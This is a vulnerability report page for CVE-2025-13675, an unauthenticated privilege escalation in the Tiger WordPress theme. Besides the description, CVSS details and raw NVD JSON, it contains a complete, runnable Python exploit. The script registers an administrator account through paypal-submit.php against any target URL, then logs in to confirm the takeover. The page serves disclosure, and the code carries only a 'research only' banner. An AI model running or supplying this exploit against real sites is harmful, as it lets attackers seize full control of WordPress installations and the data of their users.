Security Vulnerability Report
CVE-2025-13675 CVSS 9.8 CRITICAL

Published: 2025-11-27 05:16:15
Last Modified: 2026-04-15 00:35:42

Description

The Tiger theme for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 101.2.1. This is due to the 'paypal-submit.php' file not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available for this entry; the affected product is taken from the description:

Tiger theme for WordPress <= 101.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys
import uuid

import requests

# CVE-2025-13675 PoC - WordPress Tiger Theme Privilege Escalation
# Target: WordPress site using Tiger theme <= 101.2.1


def exploit_tiger_theme(target_url):
    """
    Exploit the privilege escalation vulnerability in Tiger theme.
    Attackers can register as administrator by manipulating the role parameter.
    """
    target_url = target_url.rstrip('/')

    # Path to the vulnerable paypal-submit.php file
    vulnerable_endpoint = f"{target_url}/wp-content/themes/tiger/inc/paypal-submit.php"

    # Generate random username and email for registration
    username = f"admin_{uuid.uuid4().hex[:8]}"
    email = f"{username}@attacker.com"

    # Prepare registration data with administrator role
    # This is the key exploit: specifying 'administrator' as the role
    payload = {
        'user_login': username,
        'user_email': email,
        'user_pass': 'P@ssw0rd123!',
        'role': 'administrator',  # Privilege escalation - requesting admin role
        'task': 'register'
    }

    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting vulnerable endpoint: {vulnerable_endpoint}")
    print(f"[*] Attempting to register administrator account: {username}")

    try:
        response = requests.post(vulnerable_endpoint, data=payload, timeout=30)
        if response.status_code == 200:
            print("[+] Registration request sent successfully")
            print("[+] Check if account was created with administrator privileges")
            print(f"[+] Credentials: {username} / P@ssw0rd123!")

            # Verify the created account by logging in with it
            login_url = f"{target_url}/wp-login.php"
            verify_data = {
                'log': username,
                'pwd': 'P@ssw0rd123!',
                'rememberme': 'forever',
                'redirect_to': f"{target_url}/wp-admin/"
            }
            session = requests.Session()
            login_response = session.post(login_url, data=verify_data, allow_redirects=False)
            if 'admin' in login_response.headers.get('Location', '') or login_response.status_code == 302:
                print("[+] SUCCESS: Administrator account created and login verified!")
                return True
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
    return False


if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
        exploit_tiger_theme(target)
    else:
        print("Usage: python cve-2025-13675.py http://target.com")
```

References

- https://themeforest.net/item/tiger-social-network-theme-for-companies-professionals/16203995
- https://www.wordfence.com/threat-intel/vulnerabilities/id/4750b57e-7d8d-49d7-bbbf-46483eb97bd9?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13675", "sourceIdentifier": "[email protected]", "published": "2025-11-27T05:16:15.060", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tiger theme for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 101.2.1. This is due to the 'paypal-submit.php' file not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://themeforest.net/item/tiger-social-network-theme-for-companies-professionals/16203995", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4750b57e-7d8d-49d7-bbbf-46483eb97bd9?source=cve", "source": "[email protected]"}]}}